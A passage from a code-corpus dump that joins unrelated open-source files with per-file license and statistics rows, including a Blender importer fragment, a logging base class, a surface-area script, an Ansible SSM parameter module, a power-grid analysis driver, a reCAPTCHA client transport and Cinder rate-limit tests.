objects or an empty if the wheel file is not present if wheel0: wheel = prm_in.import_file(wheel0path, scene) else: wheel = bpy.data.objects.new("wheel 0", None) scene.objects.link(wheel) wheel.empty_draw_type = "SPHERE" wheel.empty_draw_size = 0.1 wheel.location = wheel0loc wheel.parent = body_obj if wheel1: wheel = prm_in.import_file(wheel1path, scene) else: wheel = bpy.data.objects.new("wheel 1", None) scene.objects.link(wheel) wheel.empty_draw_type = "SPHERE" wheel.empty_draw_size = 0.1 wheel.location = wheel1loc wheel.parent = body_obj if wheel2: wheel = prm_in.import_file(wheel2path, scene) else: wheel = bpy.data.objects.new("wheel 2", None) scene.objects.link(wheel) wheel.empty_draw_type = "SPHERE" wheel.empty_draw_size = 0.1 wheel.location = wheel2loc wheel.parent = body_obj if wheel3: wheel = prm_in.import_file(wheel3path, scene) else: wheel = bpy.data.objects.new("wheel 3", None) scene.objects.link(wheel) wheel.empty_draw_type = "SPHERE" wheel.empty_draw_size = 0.1 wheel.location = wheel3loc wheel.parent = body_obj # Aerial representation aerial_loc = to_blender_coord(params["aerial"]["offset"]) aerial = bpy.data.objects.new( "aerial", None ) scene.objects.link(aerial) aerial.location = aerial_loc aerial.empty_draw_size = 0.1 aerial.empty_draw_type = 'PLAIN_AXES' aerial.parent = body_obj
gpl-3.0
5,301,716,076,450,188,000
30.390071
76
0.611999
false
wolcomm/rptk
rptk/base.py
1
3743
# Copyright (c) 2018 Workonline Communications (Pty) Ltd. All rights reserved. # # The contents of this file are licensed under the Apache License version 2.0 # (the "License"); you may not use this file except in compliance with the # License. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. """rptk base module.""" from __future__ import print_function from __future__ import unicode_literals import inspect import logging class BaseObject(object): """BaseObject class providing generic logging functionality.""" def __init__(self): """Initialise object.""" self._log = logging.getLogger(self.__module__) def __repr__(self): """Provide generic string representation.""" return "{}() object".format(self.cls_name) def __enter__(self): """Log context manager entry.""" self.log_ready_start() self.log_ready_done() return self def __exit__(self, exc_type, exc_val, exc_tb): """Log context manager exit.""" self.log_exit_start() self.log_exit_done() @property def opts(self): """Get self.opts if it exists.""" return getattr(self, "_opts", None) @property def log(self): """Get the current logger.""" return self._log @property def cls_name(self): """Get the class name of self.""" return self.__class__.__name__ @property def current_method(self): """Get the currently executing method name.""" return inspect.currentframe().f_back.f_code.co_name def log_init(self): """Log entry into the __init__ method.""" self.log.debug(msg="initialising {} instance".format(self.cls_name)) def log_init_done(self): """Log exit from an __init__ method.""" caller = inspect.currentframe().f_back.f_back.f_code.co_name if caller == '__init__': self.log.debug(msg="still initialising {} instance" .format(self.cls_name)) else: self.log.debug(msg="{} instance initialised".format(self.cls_name)) def log_method_enter(self, method=None): """Log entry into a class method.""" self.log.debug(msg="entering method {}.{}" .format(self.cls_name, method)) def log_method_exit(self, method=None): """Log exit from a class method.""" self.log.debug(msg="leaving method {}.{}" .format(self.cls_name, method)) def log_ready_start(self): """Log start of object initialisation.""" self.log.debug(msg="preparing {} for use".format(self)) def log_ready_done(self): """Log end of object initialisation.""" self.log.debug(msg="{} ready for use".format(self)) def log_exit_start(self): """Log start of object cleanup.""" self.log.debug(msg="cleaning up {}".format(self)) def log_exit_done(self): """Log end of object cleanup.""" self.log.debug(msg="finished cleaning up {}".format(self)) def raise_type_error(self, arg=None, cls=None): """Raise a TypeError with useful logging.""" msg = "argument {} ({}) not of type {}".format(arg.__name__, arg, cls) self.log.error(msg=msg) raise TypeError(msg) def raise_runtime_error(self, msg=None): """Raise a RuntimeError with useful logging.""" self.log.error(msg=msg) raise RuntimeError(msg)
apache-2.0
8,040,617,203,420,518,000
32.720721
79
0.606733
false
platinhom/DailyTools
scripts/ESES_ElementArea.py
1
3679
#! /usr/bin/env python # -*- coding: utf8 -*- # Author: Platinhom; Last Updated: 2015-09-10 # Calculate each element surface area by MS_Intersection and also match the atomic area results to the pqr file. # Usage: python ESES_ElementArea.py file.pqr # # Need: MS_Intersection (partition version) # Note: Only for PQR format input. # Custom: ESES parameters. import os,sys # Modify the ESES program parameter here. # You can modify to command line input parameter as you like probe=1.4 grid=0.2 buffer=4.0 if (__name__ == '__main__'): fname=sys.argv[1] fnamelist=os.path.splitext(fname) fxyzr=open(fnamelist[0]+".xyzr",'w') fr=open(fname) inlines=fr.readlines(); fr.close(); # All elements/types of input atoms, used in element area summary. atomtypes=[]; # Write out the corresponding xyzr file. for line in inlines: # Each atom if (line[:4]=="ATOM" or line[:6]=="HETATM"): # Atom element here tmp=line.split(); element=tmp[-1].upper(); atomtypes.append(element); # Extract x, y, z, r from pqr to xyzr file radius="%10.5f" % float(line[62:70].strip()); xcoor="%10.5f" % float(line[30:38].strip()); ycoor="%10.5f" % float(line[38:46].strip()); zcoor="%10.5f" % float(line[46:54].strip()); xyzrstr=xcoor+ycoor+zcoor+radius+"\n"; fxyzr.write(xyzrstr); fxyzr.close() # Use external ESES program to generate surface and calculate atom area ## So you have to put the ESES program in the same directory # Output a "partition_area.txt" file saving atom area #os.system('./MS_Intersection_Area '+fnamelist[0]+".xyzr "+str(probe)+" "+str(grid)+" "+str(buffer)); p=os.popen('./MS_Intersection '+fnamelist[0]+".xyzr "+str(probe)+" "+str(grid)+" "+str(buffer),'r') totalArea="0" totalVolume="0" while 1: line=p.readline(); if "area:" in line: totalArea=line.split(':')[1].split()[0] if "volume:" in line: totalVolume=line.split(':')[1].split()[0] if not line:break # Analyze output atom area file fa=open("partition_area.txt") atomareas=[];# tmp save atom area by atom number typedefault=["H","C","N","O","F","S","P","CL","BR","I"]; typeareas={"H":0.0,"C":0.0,"N":0.0,"O":0.0,"F":0.0,"S":0.0,"P":0.0,"CL":0.0,"BR":0.0,"I":0.0}; atomnum=0; for line in fa: tmp=line.split(); atomarea="%12.6f" % float(tmp[1]); atomareas.append(atomarea); atype=atomtypes[atomnum]; typeareas[atype]=typeareas.setdefault(atype,0.0)+float(tmp[1]); atomnum=atomnum+1; fa.close() # Write out pqra file saving atom area fwname=fnamelist[0]+"_area.pqra" fw=open(fwname,'w') # Write the total area for each element. ## Notice that here just write out the default elements. ## If you want all elements, use "typeused" for iteration. typeused=["H","C","N","O","F","S","P","CL","BR","I"]; for i in typeareas.iterkeys(): if i not in typeused:typeused.append(i); # For print out the atom area summary outputelearea=fnamelist[0]+" Areas: "+totalArea+" Volumes: "+totalVolume+" "; fw.write("REMARK AREAS "+totalArea+"\n"); fw.write("REMARK VOLUMES "+totalVolume+"\n"); for element in typedefault: # If you want all elements, need to comment the above line and uncomment the following line. #for element in typeused: fw.write("REMARK AREA "+"%2s"%element+" "+"%20.6f"%typeareas.get(element,0.0)+"\n"); outputelearea=outputelearea+element+": "+str(typeareas[element])+" "; print outputelearea fr=open(fname) atomnum=0; for line in fr: if (line[:4]=="ATOM" or line[:6]=="HETATM"): tmp=line.split(); element=tmp[-1].upper(); newline=line.strip('\n')+atomareas[atomnum]+"\n"; fw.write(newline); atomnum=atomnum+1; else: fw.write(line); fr.close(); fw.close() #end main
gpl-2.0
-1,598,104,058,107,988,000
32.144144
112
0.65969
false
ea4gja/mrig
mrig/mrig.py
1
1349
#!/usr/bin/env python # # File: mrig.py # Version: 1.0 # # mrig: main program # Copyright (c) 2016 German EA4GJA # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301, USA. from mrig_config import * from gui_tkinter import * import sys import socket import os from Tkinter import Tk import multiprocessing tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tcp.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) tcp.connect((REMOTE_SERVER, REMOTE_SERVER_TCP_PORT)) tcp.setblocking(1) udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp.bind(("", LOCAL_UDP_PORT)) udp.setblocking(0) root = Tk() gui = gui_Tkinter(root, tcp=tcp, udp=udp) root.mainloop() tcp.close() udp.close()
gpl-2.0
-2,723,161,411,879,875,600
27.104167
67
0.749444
false
Lujeni/ansible
lib/ansible/modules/cloud/amazon/aws_ssm_parameter_store.py
1
7817
#!/usr/bin/python # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'metadata_version': '1.1'} DOCUMENTATION = ''' --- module: aws_ssm_parameter_store short_description: Manage key-value pairs in aws parameter store. description: - Manage key-value pairs in aws parameter store. version_added: "2.5" options: name: description: - Parameter key name. required: true type: str description: description: - Parameter key description. required: false type: str value: description: - Parameter value. required: false type: str state: description: - Creates or modifies an existing parameter. - Deletes a parameter. required: false choices: ['present', 'absent'] default: present type: str string_type: description: - Parameter String type. required: false choices: ['String', 'StringList', 'SecureString'] default: String type: str decryption: description: - Work with SecureString type to get plain text secrets type: bool required: false default: true key_id: description: - AWS KMS key to decrypt the secrets. - The default key (C(alias/aws/ssm)) is automatically generated the first time it's requested. required: false default: alias/aws/ssm type: str overwrite_value: description: - Option to overwrite an existing value if it already exists. required: false version_added: "2.6" choices: ['never', 'changed', 'always'] default: changed type: str author: - Nathan Webster (@nathanwebsterdotme) - Bill Wang (@ozbillwang) <ozbillwang@gmail.com> - Michael De La Rue (@mikedlr) extends_documentation_fragment: - aws - ec2 requirements: [ botocore, boto3 ] ''' EXAMPLES = ''' - name: Create or update key/value pair in aws parameter store aws_ssm_parameter_store: name: "Hello" description: "This is your first key" value: "World" - name: Delete the key aws_ssm_parameter_store: name: "Hello" state: absent - name: Create or update secure key/value pair with default kms key (aws/ssm) aws_ssm_parameter_store: name: "Hello" description: "This is your first key" string_type: "SecureString" value: "World" - name: Create or update secure key/value pair with nominated kms key aws_ssm_parameter_store: name: "Hello" description: "This is your first key" string_type: "SecureString" key_id: "alias/demo" value: "World" - name: Always update a parameter store value and create a new version aws_ssm_parameter_store: name: "overwrite_example" description: "This example will always overwrite the value" string_type: "String" value: "Test1234" overwrite_value: "always" - name: recommend to use with aws_ssm lookup plugin debug: msg="{{ lookup('aws_ssm', 'hello') }}" ''' RETURN = ''' put_parameter: description: Add one or more parameters to the system. returned: success type: dict delete_parameter: description: Delete a parameter from the system. returned: success type: dict ''' from ansible.module_utils.aws.core import AnsibleAWSModule from ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info try: from botocore.exceptions import ClientError except ImportError: pass # will be captured by imported HAS_BOTO3 def update_parameter(client, module, args): changed = False response = {} try: response = client.put_parameter(**args) changed = True except ClientError as e: module.fail_json_aws(e, msg="setting parameter") return changed, response def create_update_parameter(client, module): changed = False existing_parameter = None response = {} args = dict( Name=module.params.get('name'), Value=module.params.get('value'), Type=module.params.get('string_type') ) if (module.params.get('overwrite_value') in ("always", "changed")): args.update(Overwrite=True) else: args.update(Overwrite=False) if module.params.get('description'): args.update(Description=module.params.get('description')) if module.params.get('string_type') == 'SecureString': args.update(KeyId=module.params.get('key_id')) try: existing_parameter = client.get_parameter(Name=args['Name'], WithDecryption=True) except Exception: pass if existing_parameter: if (module.params.get('overwrite_value') == 'always'): (changed, response) = update_parameter(client, module, args) elif (module.params.get('overwrite_value') == 'changed'): if existing_parameter['Parameter']['Type'] != args['Type']: (changed, response) = update_parameter(client, module, args) if existing_parameter['Parameter']['Value'] != args['Value']: (changed, response) = update_parameter(client, module, args) if args.get('Description'): # Description field not available from get_parameter function so get it from describe_parameters describe_existing_parameter = None try: describe_existing_parameter_paginator = client.get_paginator('describe_parameters') describe_existing_parameter = describe_existing_parameter_paginator.paginate( Filters=[{"Key": "Name", "Values": [args['Name']]}]).build_full_result() except ClientError as e: module.fail_json_aws(e, msg="getting description value") if describe_existing_parameter['Parameters'][0]['Description'] != args['Description']: (changed, response) = update_parameter(client, module, args) else: (changed, response) = update_parameter(client, module, args) return changed, response def delete_parameter(client, module): response = {} try: response = client.delete_parameter( Name=module.params.get('name') ) except ClientError as e: if e.response['Error']['Code'] == 'ParameterNotFound': return False, {} module.fail_json_aws(e, msg="deleting parameter") return True, response def setup_client(module): region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True) connection = boto3_conn(module, conn_type='client', resource='ssm', region=region, endpoint=ec2_url, **aws_connect_params) return connection def setup_module_object(): argument_spec = dict( name=dict(required=True), description=dict(), value=dict(required=False, no_log=True), state=dict(default='present', choices=['present', 'absent']), string_type=dict(default='String', choices=['String', 'StringList', 'SecureString']), decryption=dict(default=True, type='bool'), key_id=dict(default="alias/aws/ssm"), overwrite_value=dict(default='changed', choices=['never', 'changed', 'always']), ) return AnsibleAWSModule( argument_spec=argument_spec, ) def main(): module = setup_module_object() state = module.params.get('state') client = setup_client(module) invocations = { "present": create_update_parameter, "absent": delete_parameter, } (changed, response) = invocations[state](client, module) module.exit_json(changed=changed, response=response) if __name__ == '__main__': main()
gpl-3.0
6,053,639,846,693,307,000
28.609848
126
0.643214
false
SanPen/GridCal
src/GridCal/Engine/Simulations/LinearFactors/linear_analysis_ts_driver.py
1
10126
# This file is part of GridCal. # # GridCal is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # GridCal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GridCal. If not, see <http://www.gnu.org/licenses/>. import json import pandas as pd import numpy as np import scipy.sparse as sp from scipy.sparse.linalg import spsolve, factorized import time from GridCal.Engine.Simulations.result_types import ResultTypes from GridCal.Engine.Core.multi_circuit import MultiCircuit from GridCal.Engine.Simulations.PowerFlow.power_flow_options import PowerFlowOptions from GridCal.Engine.Simulations.LinearFactors.linear_analysis import LinearAnalysis from GridCal.Engine.Simulations.LinearFactors.linear_analysis_driver import LinearAnalysisOptions from GridCal.Engine.Simulations.results_model import ResultsModel from GridCal.Engine.Core.time_series_pf_data import compile_time_circuit from GridCal.Engine.Simulations.driver_types import SimulationTypes from GridCal.Engine.Simulations.results_template import ResultsTemplate from GridCal.Engine.Simulations.driver_template import TSDriverTemplate class LinearAnalysisTimeSeriesResults(ResultsTemplate): def __init__(self, n, m, time_array, bus_names, bus_types, branch_names): """ TimeSeriesResults constructor @param n: number of buses @param m: number of branches @param nt: number of time steps """ ResultsTemplate.__init__(self, name='Linear Analysis time series', available_results=[ResultTypes.BusActivePower, ResultTypes.BranchActivePowerFrom, ResultTypes.BranchLoading ], data_variables=['bus_names', 'bus_types', 'time', 'branch_names', 'voltage', 'S', 'Sf', 'loading', 'losses']) self.nt = len(time_array) self.m = m self.n = n self.time = time_array self.bus_names = bus_names self.bus_types = bus_types self.branch_names = branch_names self.voltage = np.ones((self.nt, n), dtype=float) self.S = np.zeros((self.nt, n), dtype=float) self.Sf = np.zeros((self.nt, m), dtype=float) self.loading = np.zeros((self.nt, m), dtype=float) self.losses = np.zeros((self.nt, m), dtype=float) def apply_new_time_series_rates(self, nc: "TimeCircuit"): rates = nc.Rates.T self.loading = self.Sf / (rates + 1e-9) def get_results_dict(self): """ Returns a dictionary with the results sorted in a dictionary :return: dictionary of 2D numpy arrays (probably of complex numbers) """ data = {'V': self.voltage.tolist(), 'P': self.S.real.tolist(), 'Q': self.S.imag.tolist(), 'Sbr_real': self.Sf.real.tolist(), 'Sbr_imag': self.Sf.imag.tolist(), 'loading': np.abs(self.loading).tolist()} return data def mdl(self, result_type: ResultTypes) -> "ResultsModel": """ Get ResultsModel instance :param result_type: :return: ResultsModel instance """ if result_type == ResultTypes.BusActivePower: labels = self.bus_names data = self.S y_label = '(MW)' title = 'Bus active power ' elif result_type == ResultTypes.BranchActivePowerFrom: labels = self.branch_names data = self.Sf.real y_label = '(MW)' title = 'Branch power ' elif result_type == ResultTypes.BranchLoading: labels = self.branch_names data = self.loading * 100 y_label = '(%)' title = 'Branch loading ' elif result_type == ResultTypes.BranchLosses: labels = self.branch_names data = self.losses y_label = '(MVA)' title = 'Branch losses' elif result_type == ResultTypes.BusVoltageModule: labels = self.bus_names data = self.voltage y_label = '(p.u.)' title = 'Bus voltage' else: raise Exception('Result type not understood:' + str(result_type)) if self.time is not None: index = self.time else: index = list(range(data.shape[0])) # assemble model return ResultsModel(data=data, index=index, columns=labels, title=title, ylabel=y_label, units=y_label) class LinearAnalysisTimeSeries(TSDriverTemplate): name = 'Linear analysis time series' tpe = SimulationTypes.LinearAnalysis_TS_run def __init__(self, grid: MultiCircuit, options: LinearAnalysisOptions, start_=0, end_=None): """ TimeSeries constructor @param grid: MultiCircuit instance @param options: LinearAnalysisOptions instance """ TSDriverTemplate.__init__(self, grid=grid, start_=start_, end_=end_) self.options = options self.results = LinearAnalysisTimeSeriesResults(n=0, m=0, time_array=[], bus_names=[], bus_types=[], branch_names=[]) self.ptdf_driver = LinearAnalysis(grid=self.grid, distributed_slack=self.options.distribute_slack) def get_steps(self): """ Get time steps list of strings """ return [l.strftime('%d-%m-%Y %H:%M') for l in self.indices] def run(self): """ Run the time series simulation @return: """ self.__cancel__ = False a = time.time() if self.end_ is None: self.end_ = len(self.grid.time_profile) time_indices = np.arange(self.start_, self.end_ + 1) ts_numeric_circuit = compile_time_circuit(self.grid) self.results = LinearAnalysisTimeSeriesResults(n=ts_numeric_circuit.nbus, m=ts_numeric_circuit.nbr, time_array=ts_numeric_circuit.time_array[time_indices], bus_names=ts_numeric_circuit.bus_names, bus_types=ts_numeric_circuit.bus_types, branch_names=ts_numeric_circuit.branch_names) self.indices = pd.to_datetime(ts_numeric_circuit.time_array[time_indices]) self.progress_text.emit('Computing PTDF...') linear_analysis = LinearAnalysis(grid=self.grid, distributed_slack=self.options.distribute_slack, correct_values=self.options.correct_values ) linear_analysis.run() self.progress_text.emit('Computing branch flows...') Pbus_0 = ts_numeric_circuit.Sbus.real[:, time_indices] self.results.Sf = linear_analysis.get_flows_time_series(Pbus_0) # compute post process self.results.loading = self.results.Sf / (ts_numeric_circuit.Rates[:, time_indices].T + 1e-9) self.results.S = Pbus_0.T self.elapsed = time.time() - a # send the finnish signal self.progress_signal.emit(0.0) self.progress_text.emit('Done!') self.done_signal.emit() if __name__ == '__main__': from matplotlib import pyplot as plt from GridCal.Engine import * fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE39_1W.gridcal' # fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/grid_2_islands.xlsx' # fname = '/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/1354 Pegase.xlsx' main_circuit = FileOpen(fname).open() options_ = LinearAnalysisOptions() ptdf_driver = LinearAnalysisTimeSeries(grid=main_circuit, options=options_) ptdf_driver.run() pf_options_ = PowerFlowOptions(solver_type=SolverType.NR) ts_driver = TimeSeries(grid=main_circuit, options=pf_options_) ts_driver.run() fig = plt.figure() ax1 = fig.add_subplot(221) ax1.set_title('Newton-Raphson based flow') ax1.plot(ts_driver.results.Sf.real) ax2 = fig.add_subplot(222) ax2.set_title('PTDF based flow') ax2.plot(ptdf_driver.results.Sf.real) ax3 = fig.add_subplot(223) ax3.set_title('Difference') diff = ts_driver.results.Sf.real - ptdf_driver.results.Sf.real ax3.plot(diff) fig2 = plt.figure() ax1 = fig2.add_subplot(221) ax1.set_title('Newton-Raphson based voltage') ax1.plot(np.abs(ts_driver.results.voltage)) ax2 = fig2.add_subplot(222) ax2.set_title('PTDF based voltage') ax2.plot(ptdf_driver.results.voltage) ax3 = fig2.add_subplot(223) ax3.set_title('Difference') diff = np.abs(ts_driver.results.voltage) - ptdf_driver.results.voltage ax3.plot(diff) plt.show()
gpl-3.0
-3,750,878,709,547,375,600
36.783582
111
0.567351
false
googleapis/googleapis-gen
google/cloud/recaptchaenterprise/v1beta1/recaptchaenterprise-v1beta1-py/google/cloud/recaptchaenterprise_v1beta1/services/recaptcha_enterprise_service_v1_beta1/transports/base.py
1
9862
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import abc from typing import Awaitable, Callable, Dict, Optional, Sequence, Union import packaging.version import pkg_resources import google.auth # type: ignore import google.api_core # type: ignore from google.api_core import exceptions as core_exceptions # type: ignore from google.api_core import gapic_v1 # type: ignore from google.api_core import retry as retries # type: ignore from google.auth import credentials as ga_credentials # type: ignore from google.oauth2 import service_account # type: ignore from google.cloud.recaptchaenterprise_v1beta1.types import recaptchaenterprise from google.protobuf import empty_pb2 # type: ignore try: DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo( gapic_version=pkg_resources.get_distribution( 'google-cloud-recaptchaenterprise', ).version, ) except pkg_resources.DistributionNotFound: DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo() try: # google.auth.__version__ was added in 1.26.0 _GOOGLE_AUTH_VERSION = google.auth.__version__ except AttributeError: try: # try pkg_resources if it is available _GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version except pkg_resources.DistributionNotFound: # pragma: NO COVER _GOOGLE_AUTH_VERSION = None class RecaptchaEnterpriseServiceV1Beta1Transport(abc.ABC): """Abstract transport class for RecaptchaEnterpriseServiceV1Beta1.""" AUTH_SCOPES = ( 'https://www.googleapis.com/auth/cloud-platform', ) DEFAULT_HOST: str = 'recaptchaenterprise.googleapis.com' def __init__( self, *, host: str = DEFAULT_HOST, credentials: ga_credentials.Credentials = None, credentials_file: Optional[str] = None, scopes: Optional[Sequence[str]] = None, quota_project_id: Optional[str] = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, always_use_jwt_access: Optional[bool] = False, **kwargs, ) -> None: """Instantiate the transport. Args: host (Optional[str]): The hostname to connect to. credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. credentials_file (Optional[str]): A file with credentials that can be loaded with :func:`google.auth.load_credentials_from_file`. This argument is mutually exclusive with credentials. scopes (Optional[Sequence[str]]): A list of scopes. quota_project_id (Optional[str]): An optional project to use for billing and quota. client_info (google.api_core.gapic_v1.client_info.ClientInfo): The client info used to send a user-agent string along with API requests. If ``None``, then default info will be used. Generally, you only need to set this if you're developing your own client library. always_use_jwt_access (Optional[bool]): Whether self signed JWT should be used for service account credentials. """ # Save the hostname. Default to port 443 (HTTPS) if none is specified. if ':' not in host: host += ':443' self._host = host scopes_kwargs = self._get_scopes_kwargs(self._host, scopes) # Save the scopes. self._scopes = scopes # If no credentials are provided, then determine the appropriate # defaults. if credentials and credentials_file: raise core_exceptions.DuplicateCredentialArgs("'credentials_file' and 'credentials' are mutually exclusive") if credentials_file is not None: credentials, _ = google.auth.load_credentials_from_file( credentials_file, **scopes_kwargs, quota_project_id=quota_project_id ) elif credentials is None: credentials, _ = google.auth.default(**scopes_kwargs, quota_project_id=quota_project_id) # If the credentials is service account credentials, then always try to use self signed JWT. if always_use_jwt_access and isinstance(credentials, service_account.Credentials) and hasattr(service_account.Credentials, "with_always_use_jwt_access"): credentials = credentials.with_always_use_jwt_access(True) # Save the credentials. self._credentials = credentials # TODO(busunkim): This method is in the base transport # to avoid duplicating code across the transport classes. These functions # should be deleted once the minimum required versions of google-auth is increased. # TODO: Remove this function once google-auth >= 1.25.0 is required @classmethod def _get_scopes_kwargs(cls, host: str, scopes: Optional[Sequence[str]]) -> Dict[str, Optional[Sequence[str]]]: """Returns scopes kwargs to pass to google-auth methods depending on the google-auth version""" scopes_kwargs = {} if _GOOGLE_AUTH_VERSION and ( packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0") ): scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES} else: scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES} return scopes_kwargs def _prep_wrapped_messages(self, client_info): # Precompute the wrapped methods. self._wrapped_methods = { self.create_assessment: gapic_v1.method.wrap_method( self.create_assessment, default_timeout=600.0, client_info=client_info, ), self.annotate_assessment: gapic_v1.method.wrap_method( self.annotate_assessment, default_timeout=600.0, client_info=client_info, ), self.create_key: gapic_v1.method.wrap_method( self.create_key, default_timeout=600.0, client_info=client_info, ), self.list_keys: gapic_v1.method.wrap_method( self.list_keys, default_timeout=600.0, client_info=client_info, ), self.get_key: gapic_v1.method.wrap_method( self.get_key, default_timeout=600.0, client_info=client_info, ), self.update_key: gapic_v1.method.wrap_method( self.update_key, default_timeout=600.0, client_info=client_info, ), self.delete_key: gapic_v1.method.wrap_method( self.delete_key, default_timeout=600.0, client_info=client_info, ), } @property def create_assessment(self) -> Callable[ [recaptchaenterprise.CreateAssessmentRequest], Union[ recaptchaenterprise.Assessment, Awaitable[recaptchaenterprise.Assessment] ]]: raise NotImplementedError() @property def annotate_assessment(self) -> Callable[ [recaptchaenterprise.AnnotateAssessmentRequest], Union[ recaptchaenterprise.AnnotateAssessmentResponse, Awaitable[recaptchaenterprise.AnnotateAssessmentResponse] ]]: raise NotImplementedError() @property def create_key(self) -> Callable[ [recaptchaenterprise.CreateKeyRequest], Union[ recaptchaenterprise.Key, Awaitable[recaptchaenterprise.Key] ]]: raise NotImplementedError() @property def list_keys(self) -> Callable[ [recaptchaenterprise.ListKeysRequest], Union[ recaptchaenterprise.ListKeysResponse, Awaitable[recaptchaenterprise.ListKeysResponse] ]]: raise NotImplementedError() @property def get_key(self) -> Callable[ [recaptchaenterprise.GetKeyRequest], Union[ recaptchaenterprise.Key, Awaitable[recaptchaenterprise.Key] ]]: raise NotImplementedError() @property def update_key(self) -> Callable[ [recaptchaenterprise.UpdateKeyRequest], Union[ recaptchaenterprise.Key, Awaitable[recaptchaenterprise.Key] ]]: raise NotImplementedError() @property def delete_key(self) -> Callable[ [recaptchaenterprise.DeleteKeyRequest], Union[ empty_pb2.Empty, Awaitable[empty_pb2.Empty] ]]: raise NotImplementedError() __all__ = ( 'RecaptchaEnterpriseServiceV1Beta1Transport', )
apache-2.0
-3,883,420,898,301,742,000
37.980237
161
0.614683
false
ge0rgi/cinder
cinder/tests/unit/api/v2/test_limits.py
1
29139
# Copyright 2011 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Tests dealing with HTTP rate-limiting. """ from oslo_serialization import jsonutils import six from six.moves import http_client from six.moves import range import webob from cinder.api.v2 import limits from cinder.api import views import cinder.context from cinder import test TEST_LIMITS = [ limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE), limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE), limits.Limit("POST", "/volumes", "^/volumes", 3, limits.PER_MINUTE), limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE), limits.Limit("PUT", "/volumes", "^/volumes", 5, limits.PER_MINUTE), ] NS = { 'atom': 'http://www.w3.org/2005/Atom', 'ns': 'http://docs.openstack.org/common/api/v1.0', } class BaseLimitTestSuite(test.TestCase): """Base test suite which provides relevant stubs and time abstraction.""" def setUp(self): super(BaseLimitTestSuite, self).setUp() self.time = 0.0 self.mock_object(limits.Limit, "_get_time", self._get_time) self.absolute_limits = {} def fake_get_project_quotas(context, project_id, usages=True): return {k: dict(limit=v) for k, v in self.absolute_limits.items()} self.mock_object(cinder.quota.QUOTAS, "get_project_quotas", fake_get_project_quotas) def _get_time(self): """Return the "time" according to this test suite.""" return self.time class LimitsControllerTest(BaseLimitTestSuite): """Tests for `limits.LimitsController` class.""" def setUp(self): """Run before each test.""" super(LimitsControllerTest, self).setUp() self.controller = limits.create_resource() def _get_index_request(self, accept_header="application/json"): """Helper to set routing arguments.""" request = webob.Request.blank("/") request.accept = accept_header request.environ["wsgiorg.routing_args"] = (None, { "action": "index", "controller": "", }) context = cinder.context.RequestContext('testuser', 'testproject') request.environ["cinder.context"] = context return request def _populate_limits(self, request): """Put limit info into a request.""" _limits = [ limits.Limit("GET", "*", ".*", 10, 60).display(), limits.Limit("POST", "*", ".*", 5, 60 * 60).display(), limits.Limit("GET", "changes-since*", "changes-since", 5, 60).display(), ] request.environ["cinder.limits"] = _limits return request def test_empty_index_json(self): """Test getting empty limit details in JSON.""" request = self._get_index_request() response = request.get_response(self.controller) expected = { "limits": { "rate": [], "absolute": {}, }, } body = jsonutils.loads(response.body) self.assertEqual(expected, body) def test_index_json(self): """Test getting limit details in JSON.""" request = self._get_index_request() request = self._populate_limits(request) self.absolute_limits = { 'gigabytes': 512, 'volumes': 5, } response = request.get_response(self.controller) expected = { "limits": { "rate": [ { "regex": ".*", "uri": "*", "limit": [ { "verb": "GET", "next-available": "1970-01-01T00:00:00", 